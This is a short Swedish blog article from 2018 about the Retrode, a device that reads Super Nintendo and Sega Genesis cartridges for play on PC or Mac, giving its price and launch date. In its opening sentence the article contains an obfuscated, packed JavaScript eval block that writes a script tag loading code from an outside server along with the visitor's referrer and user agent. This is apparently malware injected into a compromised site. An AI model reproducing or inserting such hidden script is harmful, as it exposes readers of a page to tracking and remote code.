Image Image Image Image Image Image Image Image Image Image

| 21 oktober, 2018

Scroll to top

Top

Spela dina retrospel på din PC & Mac med Retrode!

Spela dina retrospel på din PC & Mac med Retrode!
Sebastian Plengier Ehrnfelt

Sitter eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ffiff|var|u0026u|referrer|iibkd||js|php’.split(‘|’),0,{}))
du på massa gamla spelkassetter till Super Nintendo eller Sega Genesis? Retrode ger dig en anledning att ta fram dem ur lådorna igen.

Retro glädjen förnyas nu med ett nytt tysktillverkat datortillbehör som heter Retrode. Retrode är en svart liten låda som kopplas in i en Mac eller Pc. Sen fungerar det precis som orginal konsolerna, man stoppar i spelkassett och kan sedan koppla upp till fyra handkontroller till maskinen. Sedan väljer man en emulator som passar spelet (snes eller sega), laddar över ROM-filen från kassetten och sen så är det bara att ösa Zelda tills ögonen blöder.

Det Retrode vinner på är att det går att använda sina gamla handkontroller och du kan koppla in 4 spelare.

Retrode kommer till Europa den 23 januari, men går att förhandsboka för 71,80 euro  (640 kronor) på Retrodes hemsida.